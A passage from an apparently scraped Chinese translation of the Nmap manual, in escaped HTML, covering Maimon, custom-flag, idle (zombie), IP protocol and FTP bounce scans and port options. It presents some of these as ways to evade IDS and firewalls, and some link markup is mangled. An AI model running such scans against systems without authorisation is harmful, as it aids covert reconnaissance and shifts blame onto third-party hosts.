\u800c\u5173\u95ed\u7aef\u53e3\u7684\u7a97\u53e3\u5927\u5c0f\u4e3a0\u3002\u56e0\u6b64\uff0c\u5f53\u6536\u5230RST\u65f6\uff0c\u7a97\u53e3\u626b\u63cf\u4e0d\u603b\u662f\u628a\u7aef\u53e3\u6807\u8bb0\u4e3a&nbsp;<code>unfiltered<\/code>\uff0c \u800c\u662f\u6839\u636eTCP\u7a97\u53e3\u503c\u662f\u6b63\u6570\u8fd8\u662f0\uff0c\u5206\u522b\u628a\u7aef\u53e3\u6807\u8bb0\u4e3a<code>open<\/code>\u6216\u8005&nbsp;<code>closed<\/code><\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8be5\u626b\u63cf\u4f9d\u8d56\u4e8e\u4e92\u8054\u7f51\u4e0a\u5c11\u6570\u7cfb\u7edf\u7684\u5b9e\u73b0\u7ec6\u8282\uff0c \u56e0\u6b64\u60a8\u4e0d\u80fd\u6c38\u8fdc\u76f8\u4fe1\u5b83\u3002\u4e0d\u652f\u6301\u5b83\u7684\u7cfb\u7edf\u4f1a\u901a\u5e38\u8fd4\u56de\u6240\u6709\u7aef\u53e3<code>closed<\/code>\u3002 \u5f53\u7136\uff0c\u4e00\u53f0\u673a\u5668\u6ca1\u6709\u5f00\u653e\u7aef\u53e3\u4e5f\u662f\u6709\u53ef\u80fd\u7684\u3002 \u5982\u679c\u5927\u90e8\u5206\u88ab\u626b\u63cf\u7684\u7aef\u53e3\u662f&nbsp;<code>closed<\/code>\uff0c\u800c\u4e00\u4e9b\u5e38\u89c1\u7684\u7aef\u53e3 (\u5982 22\uff0c 25\uff0c53) \u662f&nbsp;<code>filtered<\/code>\uff0c\u8be5\u7cfb\u7edf\u5c31\u975e\u5e38\u53ef\u7591\u4e86\u3002 \u5076\u5c14\u5730\uff0c\u7cfb\u7edf\u751a\u81f3\u4f1a\u663e\u793a\u6070\u6070\u76f8\u53cd\u7684\u884c\u4e3a\u3002 \u5982\u679c\u60a8\u7684\u626b\u63cf\u663e\u793a1000\u4e2a\u5f00\u653e\u7684\u7aef\u53e3\u548c3\u4e2a\u5173\u95ed\u7684\u6216\u8005\u88ab\u8fc7\u6ee4\u7684\u7aef\u53e3\uff0c \u90a3\u4e48\u90a33\u4e2a\u5f88\u53ef\u80fd\u4e5f\u662f\u5f00\u653e\u7684\u7aef\u53e3\u3002<code>-sM<\/code>&nbsp;(TCP Maimon\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">Maimon\u626b\u63cf\u662f\u7528\u5b83\u7684\u53d1\u73b0\u8005Uriel Maimon\u547d\u540d\u7684\u3002\u4ed6\u5728 Phrack Magazine issue #49 (November 1996)\u4e2d\u63cf\u8ff0\u4e86\u8fd9\u4e00\u6280\u672f\u3002 Nmap\u5728\u4e24\u671f\u540e\u52a0\u5165\u4e86\u8fd9\u4e00\u6280\u672f\u3002 \u8fd9\u9879\u6280\u672f\u548cNull\uff0cFIN\uff0c\u4ee5\u53caXmas\u626b\u63cf\u5b8c\u5168\u4e00\u6837\uff0c\u9664\u4e86\u63a2\u6d4b\u62a5\u6587\u662fFIN\/ACK\u3002 \u6839\u636eRFC 793 (TCP)\uff0c\u65e0\u8bba\u7aef\u53e3\u5f00\u653e\u6216\u8005\u5173\u95ed\uff0c\u90fd\u5e94\u8be5\u5bf9\u8fd9\u6837\u7684\u63a2\u6d4b\u54cd\u5e94RST\u62a5\u6587\u3002 \u7136\u800c\uff0cUriel\u6ce8\u610f\u5230\u5982\u679c\u7aef\u53e3\u5f00\u653e\uff0c\u8bb8\u591a\u57fa\u4e8eBSD\u7684\u7cfb\u7edf\u53ea\u662f\u4e22\u5f03\u8be5\u63a2\u6d4b\u62a5\u6587\u3002<code>--scanflags<\/code>&nbsp;(\u5b9a\u5236\u7684TCP\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u771f\u6b63\u7684Nmap\u9ad8\u7ea7\u7528\u6237\u4e0d\u9700\u8981\u88ab\u8fd9\u4e9b\u73b0\u6210\u7684\u626b\u63cf\u7c7b\u578b\u675f\u7f1a\u3002&nbsp;<code>--scanflags<\/code>\u9009\u9879\u5141\u8bb8\u60a8\u901a\u8fc7\u6307\u5b9a\u4efb\u610fTCP\u6807\u5fd7\u4f4d\u6765\u8bbe\u8ba1\u60a8\u81ea\u5df1\u7684\u626b\u63cf\u3002 \u8ba9\u60a8\u7684\u521b\u9020\u529b\u6d41\u52a8\uff0c\u8eb2\u5f00\u90a3\u4e9b\u4ec5\u9760\u672c\u624b\u518c\u6dfb\u52a0\u89c4\u5219\u7684\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf\uff01<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>--scanflags<\/code>\u9009\u9879\u53ef\u4ee5\u662f\u4e00\u4e2a\u6570\u5b57\u6807\u8bb0\u503c\u59829 (PSH\u548cFIN)\uff0c \u4f46\u4f7f\u7528\u5b57\u7b26\u540d\u66f4\u5bb9\u6613\u4e9b\u3002 \u53ea\u8981\u662f<code>URG<\/code>\uff0c&nbsp;<code>ACK<\/code>\uff0c<code>PSH<\/code>\uff0c&nbsp;<code>RST<\/code>\uff0c<code>SYN<\/code>\uff0cand&nbsp;<code>FIN<\/code>\u7684\u4efb\u4f55\u7ec4\u5408\u5c31\u884c\u3002\u4f8b\u5982\uff0c<code>--scanflags URGACKPSHRSTSYNFIN<\/code>\u8bbe\u7f6e\u4e86\u6240\u6709\u6807\u5fd7\u4f4d\uff0c\u4f46\u662f\u8fd9\u5bf9\u626b\u63cf\u6ca1\u6709\u592a\u5927\u7528\u5904\u3002 \u6807\u5fd7\u4f4d\u7684\u987a\u5e8f\u4e0d\u91cd\u8981\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9664\u4e86\u8bbe\u7f6e\u9700\u8981\u7684\u6807\u5fd7\u4f4d\uff0c\u60a8\u4e5f\u53ef\u4ee5\u8bbe\u7f6e TCP\u626b\u63cf\u7c7b\u578b(\u5982<code>-sA<\/code>\u6216\u8005<code>-sF<\/code>)\u3002 \u90a3\u4e2a\u57fa\u672c\u7c7b\u578b\u544a\u8bc9Nmap\u600e\u6837\u89e3\u91ca\u54cd\u5e94\u3002\u4f8b\u5982\uff0c SYN\u626b\u63cf\u8ba4\u4e3a\u6ca1\u6709\u54cd\u5e94\u610f\u5473\u7740&nbsp;<code>filtered<\/code>\u7aef\u53e3\uff0c\u800cFIN\u626b\u63cf\u5219\u8ba4\u4e3a\u662f&nbsp;<code>open|filtered<\/code>\u3002 \u9664\u4e86\u4f7f\u7528\u60a8\u6307\u5b9a\u7684TCP\u6807\u8bb0\u4f4d\uff0cNmap\u4f1a\u548c\u57fa\u672c\u626b\u63cf\u7c7b\u578b\u4e00\u6837\u5de5\u4f5c\u3002 \u5982\u679c\u60a8\u4e0d\u6307\u5b9a\u57fa\u672c\u7c7b\u578b\uff0c\u5c31\u4f7f\u7528SYN\u626b\u63cf\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u4f8b\u5982\uff1a\u5b9a\u5236\u4e00\u4e2a\u5305\u542bACK\u626b\u63cf\u548cSYN\u626b\u63cf\u7684\u5b89\u88c5\u5305<br>\u547d\u4ee4\uff1anmap --scanflags ACKSYN nmap.org<\/strong><br><code>-sI &lt;zombie host[:probeport]&gt;<\/code>&nbsp;(Idlescan)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u79cd\u9ad8\u7ea7\u7684\u626b\u63cf\u65b9\u6cd5\u5141\u8bb8\u5bf9\u76ee\u6807\u8fdb\u884c\u771f\u6b63\u7684TCP\u7aef\u53e3\u76f2\u626b\u63cf (\u610f\u5473\u7740\u6ca1\u6709\u62a5\u6587\u4ece\u60a8\u7684\u771f\u5b9eIP\u5730\u5740\u53d1\u9001\u5230\u76ee\u6807)\u3002\u76f8\u53cd\uff0cside-channel\u653b\u51fb \u5229\u7528zombie\u4e3b\u673a\u4e0a\u5df2\u77e5\u7684IP\u5206\u6bb5ID\u5e8f\u5217\u751f\u6210\u7b97\u6cd5\u6765\u7aa5\u63a2\u76ee\u6807\u4e0a\u5f00\u653e\u7aef\u53e3\u7684\u4fe1\u606f\u3002 IDS\u7cfb\u7edf\u5c06\u663e\u793a\u626b\u63cf\u6765\u81ea\u60a8\u6307\u5b9a\u7684zombie\u673a(\u5fc5\u987b\u8fd0\u884c\u5e76\u4e14\u7b26\u5408\u4e00\u5b9a\u7684\u6807\u51c6)\u3002 \u8fd9\u79cd\u5947\u5999\u7684\u626b\u63cf\u7c7b\u578b\u592a\u590d\u6742\u4e86\uff0c\u4e0d\u80fd\u5728\u6b64\u5b8c\u5168\u63cf\u8ff0\uff0c\u6240\u4ee5\u6211\u5199\u4e00\u7bc7\u975e\u6b63\u5f0f\u7684\u8bba\u6587\uff0c \u53d1\u5e03\u5728<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=https:\/\/nmap.org\/book\/idlescan.html\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/nmap.org\/book\/idlescan.html\" rel=\"nofollow\" >https:\/\/nmap.org\/book\/idlescan.html<\/a><\/a>\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9664\u4e86\u6781\u7aef\u9690\u853d(\u7531\u4e8e\u5b83\u4e0d\u4ece\u771f\u5b9eIP\u5730\u5740\u53d1\u9001\u4efb\u4f55\u62a5\u6587)\uff0c \u8be5\u626b\u63cf\u7c7b\u578b\u53ef\u4ee5\u5efa\u7acb\u673a\u5668\u95f4\u7684\u57fa\u4e8eIP\u7684\u4fe1\u4efb\u5173\u7cfb\u3002 \u7aef\u53e3\u5217\u8868<em>\u4ecezombie \u4e3b\u673a\u7684\u89d2\u5ea6\u3002<\/em>\u663e\u793a\u5f00\u653e\u7684\u7aef\u53e3\u3002 \u56e0\u6b64\u60a8\u53ef\u4ee5\u5c1d\u8bd5\u7528\u60a8\u8ba4\u4e3a(\u901a\u8fc7\u8def\u7531\u5668\/\u5305\u8fc7\u6ee4\u89c4\u5219)\u53ef\u80fd\u88ab\u4fe1\u4efb\u7684 zombies\u626b\u63cf\u76ee\u6807\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u60a8\u7531\u4e8eIPID\u6539\u53d8\u5e0c\u671b\u63a2\u6d4bzombie\u4e0a\u7684\u7279\u5b9a\u7aef\u53e3\uff0c \u60a8\u53ef\u4ee5\u5728zombie \u4e3b\u673a\u540e\u52a0\u4e0a\u4e00\u4e2a\u5192\u53f7\u548c\u7aef\u53e3\u53f7\u3002 \u5426\u5219Nmap\u4f1a\u4f7f\u7528\u9ed8\u8ba4\u7aef\u53e3(80)\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap -sI www.0day.co:80 172.27.42.110 &nbsp;\/\/\u8fd9\u662f\u5229\u7528\u5c06\u662f\u4e3b\u673a\u662fwww.0day.co\u7684\u4e3b\u673a\u5bf9172.27.42.110\u8fdb\u884c\u7a7a\u95f2\u626b\u63cf\u3002\u5982\u679c\u6709IDS,IDS\u4f1a\u628awww.0day.co\u5f53\u4f5c\u626b\u63cf\u8005-sO &nbsp;(IP\u534f\u8bae\u626b\u63cf): O\u662f\u5927\u5199\u5b57\u6bcd\uff0c\u4e0d\u662f\u6570\u5b570<\/p>\n\n\n<p class=\"wp-block-paragraph\">IP \u534f\u8bae\u626b\u63cf\u53ef\u4ee5\u8ba9\u60a8\u786e\u5b9a\u76ee\u6807\u673a\u652f\u6301\u54ea\u4e9bIP\u534f\u8bae (TCP\uff0cICMP\uff0cIGMP\uff0c\u7b49\u7b49)\u3002\u4ece\u6280\u672f\u4e0a\u8bf4\uff0c\u8fd9\u4e0d\u662f\u7aef\u53e3\u626b\u63cf \uff0c\u65e2\u7136\u5b83\u904d\u5386\u7684\u662fIP\u534f\u8bae\u53f7\u800c\u4e0d\u662fTCP\u6216\u8005UDP\u7aef\u53e3\u53f7\u3002 \u4f46\u662f\u5b83\u4ecd\u4f7f\u7528&nbsp;<code>-p<\/code>\u9009\u9879\u9009\u62e9\u8981\u626b\u63cf\u7684\u534f\u8bae\u53f7\uff0c \u7528\u6b63\u5e38\u7684\u7aef\u53e3\u8868\u683c\u5f0f\u62a5\u544a\u7ed3\u679c\uff0c\u751a\u81f3\u7528\u548c\u771f\u6b63\u7684\u7aef\u53e3\u626b\u63cf\u4e00\u6837 \u7684\u626b\u63cf\u5f15\u64ce\u3002\u56e0\u6b64\u5b83\u548c\u7aef\u53e3\u626b\u63cf\u975e\u5e38\u63a5\u8fd1\uff0c\u4e5f\u88ab\u653e\u5728\u8fd9\u91cc\u8ba8\u8bba\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9664\u4e86\u672c\u8eab\u5f88\u6709\u7528\uff0c\u534f\u8bae\u626b\u63cf\u8fd8\u663e\u793a\u4e86\u5f00\u6e90\u8f6f\u4ef6\u7684\u529b\u91cf\u3002 \u5c3d\u7ba1\u57fa\u672c\u60f3\u6cd5\u975e\u5e38\u7b80\u5355\uff0c\u6211\u8fc7\u53bb\u4ece\u6ca1\u60f3\u8fc7\u589e\u52a0\u8fd9\u4e00\u529f\u80fd\u4e5f\u6ca1\u6536\u5230\u4efb\u4f55\u5bf9\u5b83\u7684\u8bf7\u6c42\u3002 \u57282000\u5e74\u590f\u5929\uff0cGerhard Rieger\u5b55\u80b2\u4e86\u8fd9\u4e2a\u60f3\u6cd5\uff0c\u5199\u4e86\u4e00\u4e2a\u5f88\u68d2\u7684\u8865\u4e01\u7a0b\u5e8f\uff0c\u53d1\u9001\u5230nmap-hackers\u90ae\u4ef6\u5217\u8868\u3002 \u6211\u628a\u90a3\u4e2a\u8865\u4e01\u52a0\u5165\u4e86Nmap\uff0c\u7b2c\u4e8c\u5929\u53d1\u5e03\u4e86\u65b0\u7248\u672c\u3002 \u51e0\u4e4e\u6ca1\u6709\u5546\u4e1a\u8f6f\u4ef6\u4f1a\u6709\u7528\u6237\u6709\u8db3\u591f\u7684\u70ed\u60c5\u8bbe\u8ba1\u5e76\u8d21\u732e\u4ed6\u4eec\u7684\u6539\u8fdb\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u534f\u8bae\u626b\u63cf\u4ee5\u548cUDP\u626b\u63cf\u7c7b\u4f3c\u7684\u65b9\u5f0f\u5de5\u4f5c\u3002\u5b83\u4e0d\u662f\u5728UDP\u62a5\u6587\u7684\u7aef\u53e3\u57df\u4e0a\u5faa\u73af\uff0c \u800c\u662f\u5728IP\u534f\u8bae\u57df\u76848\u4f4d\u4e0a\u5faa\u73af\uff0c\u53d1\u9001IP\u62a5\u6587\u5934\u3002 \u62a5\u6587\u5934\u901a\u5e38\u662f\u7a7a\u7684\uff0c\u4e0d\u5305\u542b\u6570\u636e\uff0c\u751a\u81f3\u4e0d\u5305\u542b\u6240\u7533\u660e\u7684\u534f\u8bae\u7684\u6b63\u786e\u62a5\u6587\u5934 TCP\uff0cUDP\uff0c\u548cICMP\u662f\u4e09\u4e2a\u4f8b\u5916\u3002\u5b83\u4eec\u4e09\u4e2a\u4f1a\u4f7f\u7528\u6b63\u5e38\u7684\u534f\u8bae\u5934\uff0c\u56e0\u4e3a\u5426\u5219\u67d0\u4e9b\u7cfb \u7edf\u62d2\u7edd\u53d1\u9001\uff0c\u800c\u4e14Nmap\u6709\u51fd\u6570\u521b\u5efa\u5b83\u4eec\u3002\u534f\u8bae\u626b\u63cf\u4e0d\u662f\u6ce8\u610fICMP\u7aef\u53e3\u4e0d\u53ef\u5230\u8fbe\u6d88\u606f\uff0c \u800c\u662fICMP&nbsp;<em>\u534f\u8bae<\/em>\u4e0d\u53ef\u5230\u8fbe\u6d88\u606f\u3002\u5982\u679cNmap\u4ece\u76ee\u6807\u4e3b\u673a\u6536\u5230 \u4efb\u4f55\u534f\u8bae\u7684\u4efb\u4f55\u54cd\u5e94\uff0cNmap\u5c31\u628a\u90a3\u4e2a\u534f\u8bae\u6807\u8bb0\u4e3a<code>open<\/code>\u3002 ICMP\u534f\u8bae\u4e0d\u53ef\u5230\u8fbe \u9519\u8bef(\u7c7b\u578b 3\uff0c\u4ee3\u53f7 2) \u5bfc\u81f4\u534f\u8bae\u88ab\u6807\u8bb0\u4e3a&nbsp;<code>closed<\/code>\u3002\u5176\u5b83ICMP\u4e0d\u53ef\u5230\u8fbe\u534f\u8bae(\u7c7b\u578b 3\uff0c\u4ee3\u53f7 1\uff0c3\uff0c9\uff0c10\uff0c\u6216\u800513) \u5bfc\u81f4\u534f\u8bae\u88ab\u6807\u8bb0\u4e3a<code>filtered<\/code>&nbsp;(\u867d\u7136\u540c\u65f6\u4ed6\u4eec\u8bc1\u660eICMP\u662f&nbsp;<code>open<\/code>&nbsp;)\u3002\u5982\u679c\u91cd\u8bd5\u4e4b\u540e\u4ecd\u6ca1\u6709\u6536\u5230\u54cd\u5e94\uff0c \u8be5\u534f\u8bae\u5c31\u88ab\u6807\u8bb0\u4e3a<code>open|filtered<\/code><code>-b &lt;ftp relay host&gt;<\/code>&nbsp;(FTP\u5f39\u8df3\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">FTP\u534f\u8bae\u7684\u4e00\u4e2a\u6709\u8da3\u7279\u5f81(<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.rfc-editor.org\/rfc\/rfc959.txt\" rel=\"noreferrer noopener\" rel=\"nofollow\" >RFC 959<\/a>) \u662f\u652f\u6301\u6240\u8c13\u4ee3\u7406ftp\u8fde\u63a5\u3002\u5b83\u5141\u8bb8\u7528\u6237\u8fde\u63a5\u5230\u4e00\u53f0FTP\u670d\u52a1\u5668\uff0c\u7136\u540e\u8981\u6c42\u6587\u4ef6\u9001\u5230\u4e00\u53f0\u7b2c\u4e09\u65b9\u670d\u52a1\u5668\u3002 \u8fd9\u4e2a\u7279\u6027\u5728\u5f88\u591a\u5c42\u6b21\u4e0a\u88ab\u6ee5\u7528\uff0c\u6240\u4ee5\u8bb8\u591a\u670d\u52a1\u5668\u5df2\u7ecf\u505c\u6b62\u652f\u6301\u5b83\u4e86\u3002\u5176\u4e2d\u4e00\u79cd\u5c31\u662f\u5bfc\u81f4FTP\u670d\u52a1\u5668\u5bf9\u5176\u5b83\u4e3b\u673a\u7aef\u53e3\u626b\u63cf\u3002 \u53ea\u8981\u8bf7\u6c42FTP\u670d\u52a1\u5668\u8f6e\u6d41\u53d1\u9001\u4e00\u4e2a\u6587\u4ef6\u5230\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u6240\u611f\u5174\u8da3\u7684\u7aef\u53e3\u3002 \u9519\u8bef\u6d88\u606f\u4f1a\u63cf\u8ff0\u7aef\u53e3\u662f\u5f00\u653e\u8fd8\u662f\u5173\u95ed\u7684\u3002 \u8fd9\u662f\u7ed5\u8fc7\u9632\u706b\u5899\u7684\u597d\u65b9\u6cd5\uff0c\u56e0\u4e3aFTP\u670d\u52a1\u5668\u5e38\u5e38\u88ab\u7f6e\u4e8e\u53ef\u4ee5\u8bbf\u95ee\u6bd4Web\u4e3b\u673a\u66f4\u591a\u5176\u5b83\u5185\u90e8\u4e3b\u673a\u7684\u4f4d\u7f6e\u3002 Nmap\u7528<a href=\"mailto:code&gt;-b&lt;\/code&gt;\u9009\u9879\u652f\u6301ftp\u5f39\u8df3\u626b\u63cf\u3002\u53c2\u6570\u683c\u5f0f\u662f&amp;nbsp;&lt;em&gt;&lt;code&gt;&amp;lt;username&amp;gt;&lt;\/code&gt;&lt;\/em&gt;:&lt;em&gt;&lt;code&gt;&amp;lt;password&amp;gt;&lt;\/code&gt;&lt;\/em&gt;@&lt;em\" rel=\"nofollow\" >code>-b<\/code>\u9009\u9879\u652f\u6301ftp\u5f39\u8df3\u626b\u63cf\u3002\u53c2\u6570\u683c\u5f0f\u662f&nbsp;<em><code>&lt;username&gt;<\/code><\/em>:<em><code>&lt;password&gt;<\/code><\/em>@<em<\/a><code>&lt;server&gt;<\/code><\/em>:<em><code>&lt;port&gt;<\/code><\/em>\u3002&nbsp;<em><code>&lt;Server&gt;<\/code><\/em>&nbsp;\u662f\u67d0\u4e2a\u8106\u5f31\u7684FTP\u670d\u52a1\u5668\u7684\u540d\u5b57\u6216\u8005IP\u5730\u5740\u3002 \u60a8\u4e5f\u8bb8\u53ef\u4ee5\u7701\u7565<em><code>&lt;username&gt;<\/code><\/em>:<em><code>&lt;password&gt;<\/code><\/em>\uff0c \u5982\u679c\u670d\u52a1\u5668\u4e0a\u5f00\u653e\u4e86\u533f\u540d\u7528\u6237(user:<a href=\"mailto:code&gt;anonymous&lt;\/code&gt;&amp;nbsp;password:&lt;code&gt;-wwwuser@&lt;\/code\" rel=\"nofollow\" >code>anonymous<\/code>&nbsp;password:<code>-wwwuser@<\/code<\/a>)\u3002 \u7aef\u53e3\u53f7(\u4ee5\u53ca\u524d\u9762\u7684\u5192\u53f7) \u4e5f\u53ef\u4ee5\u7701\u7565\uff0c\u5982\u679c<em><code>&lt;server&gt;<\/code><\/em>\u4f7f\u7528\u9ed8\u8ba4\u7684FTP\u7aef\u53e3(21)\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5f53Nmap1997\u5e74\u53d1\u5e03\u65f6\uff0c\u8fd9\u4e2a\u5f31\u70b9\u88ab\u5e7f\u6cdb\u5229\u7528\uff0c\u4f46\u73b0\u5728\u5927\u90e8\u5206\u5df2\u7ecf\u88abfix\u4e86\u3002 \u8106\u5f31\u7684\u670d\u52a1\u5668\u4ecd\u7136\u5b58\u5728\uff0c\u6240\u4ee5\u5982\u679c\u5176\u5b83\u90fd\u5931\u8d25\u4e86\uff0c\u8fd9\u4e5f\u503c\u5f97\u4e00\u8bd5\u3002 \u5982\u679c\u60a8\u7684\u76ee\u6807\u662f\u7ed5\u8fc7\u9632\u706b\u5899\uff0c\u626b\u63cf\u76ee\u6807\u7f51\u7edc\u4e0a\u7684\u5f00\u653e\u768421\u7aef\u53e3(\u6216\u8005 \u751a\u81f3\u4efb\u4f55ftp\u670d\u52a1\uff0c\u5982\u679c\u60a8\u7528\u7248\u672c\u63a2\u6d4b\u626b\u63cf\u6240\u6709\u7aef\u53e3)\uff0c \u7136\u540e\u5bf9\u6bcf\u4e2a\u5c1d\u8bd5\u5f39\u8df3\u626b\u63cf\u3002Nmap\u4f1a\u544a\u8bc9\u60a8\u8be5\u4e3b\u673a\u8106\u5f31\u4e0e\u5426\u3002 \u5982\u679c\u60a8\u53ea\u662f\u8bd5\u7740\u73a9Nmap\uff0c\u60a8\u4e0d\u5fc5(\u4e8b\u5b9e\u4e0a\uff0c\u4e0d\u5e94\u8be5)\u9650\u5236\u60a8\u81ea\u5df1\u3002 \u5728\u60a8\u968f\u673a\u5730\u5728\u4e92\u8054\u7f51\u4e0a\u5bfb\u627e\u8106\u5f31\u7684FTP\u670d\u52a1\u5668\u65f6\uff0c\u8003\u8651\u4e00\u4e0b\u7cfb\u7edf\u7ba1\u7406\u5458\u4e0d\u592a\u559c\u6b22\u60a8\u8fd9\u6837\u6ee5\u7528\u4ed6\u4eec\u7684\u670d\u52a1\u5668\u3002<\/p>\n\n\n<h1 class=\"wp-block-heading\">\u7aef\u53e3\u8bf4\u660e\u548c\u626b\u63cf\u987a\u5e8f<\/h1>\n\n\n<p class=\"wp-block-paragraph\">\u9664\u4e86\u6240\u6709\u524d\u9762\u8ba8\u8bba\u7684\u626b\u63cf\u65b9\u6cd5\uff0c Nmap\u63d0\u4f9b\u9009\u9879\u8bf4\u660e\u90a3\u4e9b\u7aef\u53e3\u88ab\u626b\u63cf\u4ee5\u53ca\u626b\u63cf\u662f\u968f\u673a\u8fd8\u662f\u987a\u5e8f\u8fdb\u884c\u3002 \u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cNmap\u7528\u6307\u5b9a\u7684\u534f\u8bae\u5bf9\u7aef\u53e31\u52301024\u4ee5\u53ca<code>nmap-services<\/code>&nbsp;\u6587\u4ef6\u4e2d\u5217\u51fa\u7684\u66f4\u9ad8\u7684\u7aef\u53e3\u5728\u626b\u63cf\u3002<code>-p &lt;port ranges&gt;<\/code>&nbsp;(\u53ea\u626b\u63cf\u6307\u5b9a\u7684\u7aef\u53e3)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8be5\u9009\u9879\u6307\u660e\u60a8\u60f3\u626b\u63cf\u7684\u7aef\u53e3\uff0c\u8986\u76d6\u9ed8\u8ba4\u503c\u3002 \u5355\u4e2a\u7aef\u53e3\u548c\u7528\u8fde\u5b57\u7b26\u8868\u793a\u7684\u7aef\u53e3\u8303\u56f4(\u5982 1-1023)\u90fd\u53ef\u4ee5\u3002 \u8303\u56f4\u7684\u5f00\u59cb\u4ee5\u53ca\/\u6216\u8005\u7ed3\u675f\u503c\u53ef\u4ee5\u88ab\u7701\u7565\uff0c \u5206\u522b\u5bfc\u81f4Nmap\u4f7f\u75281\u548c65535\u3002\u6240\u4ee5\u60a8\u53ef\u4ee5\u6307\u5b9a&nbsp;<code>-p-<\/code>\u4ece\u7aef\u53e31\u626b\u63cf\u523065535\u3002 \u5982\u679c\u60a8\u7279\u522b\u6307\u5b9a\uff0c\u4e5f\u53ef\u4ee5\u626b\u63cf\u7aef\u53e30\u3002 \u5bf9\u4e8eIP\u534f\u8bae\u626b\u63cf(<code>-sO<\/code>)\uff0c\u8be5\u9009\u9879\u6307\u5b9a\u60a8\u5e0c\u671b\u626b\u63cf\u7684\u534f\u8bae\u53f7 (0-255)\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u65e2\u626b\u63cfTCP\u7aef\u53e3\u53c8\u626b\u63cfUDP\u7aef\u53e3\u65f6\uff0c\u60a8\u53ef\u4ee5\u901a\u8fc7\u5728\u7aef\u53e3\u53f7\u524d\u52a0\u4e0a<code>T:<\/code>&nbsp;\u6216\u8005<code>U:<\/code>\u6307\u5b9a\u534f\u8bae\u3002 \u534f\u8bae\u9650\u5b9a\u7b26\u4e00\u76f4\u6709\u6548\u60a8\u76f4\u5230\u6307\u5b9a\u53e6\u4e00\u4e2a\u3002 \u4f8b\u5982\uff0c\u53c2\u6570&nbsp;<code>-p U:53\uff0c111\uff0c137\uff0cT:21-25\uff0c80\uff0c139\uff0c8080<\/code>&nbsp;\u5c06\u626b\u63cfUDP \u7aef\u53e353\uff0c111\uff0c\u548c137\uff0c\u540c\u65f6\u626b\u63cf\u5217\u51fa\u7684TCP\u7aef\u53e3\u3002\u6ce8\u610f\uff0c\u8981\u65e2\u626b\u63cf UDP\u53c8\u626b\u63cfTCP\uff0c\u60a8\u5fc5\u987b\u6307\u5b9a&nbsp;<code>-sU<\/code>&nbsp;\uff0c\u4ee5\u53ca\u81f3\u5c11\u4e00\u4e2aTCP\u626b\u63cf\u7c7b\u578b(\u5982&nbsp;<code>-sS<\/code>\uff0c<code>-sF<\/code>\uff0c\u6216\u8005&nbsp;<code>-sT<\/code>)\u3002\u5982\u679c\u6ca1\u6709\u7ed9\u5b9a\u534f\u8bae\u9650\u5b9a\u7b26\uff0c \u7aef\u53e3\u53f7\u4f1a\u88ab\u52a0\u5230\u6240\u6709\u534f\u8bae\u5217\u8868\u3002<code>-F<\/code>&nbsp;(\u5feb\u901f (\u6709\u9650\u7684\u7aef\u53e3) \u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5728nmap\u7684<code>nmap-services<\/code>&nbsp;\u6587\u4ef6\u4e2d(\u5bf9\u4e8e<code>-sO<\/code>\uff0c\u662f\u534f\u8bae\u6587\u4ef6)\u6307\u5b9a\u60a8\u60f3\u8981\u626b\u63cf\u7684\u7aef\u53e3\u3002 \u8fd9\u6bd4\u626b\u63cf\u6240\u670965535\u4e2a\u7aef\u53e3\u5feb\u5f97\u591a\u3002 \u56e0\u4e3a\u8be5\u5217\u8868\u5305\u542b\u5982\u6b64\u591a\u7684TCP\u7aef\u53e3(1200\u591a)\uff0c\u8fd9\u548c\u9ed8\u8ba4\u7684TCP\u626b\u63cf scan (\u5927\u7ea61600\u4e2a\u7aef\u53e3)\u901f\u5ea6\u5dee\u522b\u4e0d\u662f\u5f88\u5927\u3002\u5982\u679c\u60a8\u7528<code>--datadir<\/code>\u9009\u9879\u6307\u5b9a\u60a8\u81ea\u5df1\u7684 \u5c0f\u5c0f\u7684<code>nmap-services<\/code>\u6587\u4ef6 \uff0c\u5dee\u522b\u4f1a\u5f88\u60ca\u4eba\u3002<code>-r<\/code>&nbsp;(\u4e0d\u8981\u6309\u968f\u673a\u987a\u5e8f\u626b\u63cf\u7aef\u53e3)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cNmap\u6309\u968f\u673a\u987a\u5e8f\u626b\u63cf\u7aef\u53e3 (\u9664\u4e86\u51fa\u4e8e\u6548\u7387\u7684\u8003\u8651\uff0c\u5e38\u7528\u7684\u7aef\u53e3\u524d\u79fb)\u3002\u8fd9\u79cd\u968f\u673a\u5316\u901a\u5e38\u90fd\u662f\u53d7\u6b22\u8fce\u7684\uff0c \u4f46\u60a8\u4e5f\u53ef\u4ee5\u6307\u5b9a<code>-r<\/code>\u6765\u987a\u5e8f\u7aef\u53e3\u626b\u63cf\u3002<\/p>\n\n\n<h1 class=\"wp-block-heading\">\u670d\u52a1\u548c\u7248\u672c\u63a2\u6d4b<\/h1>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 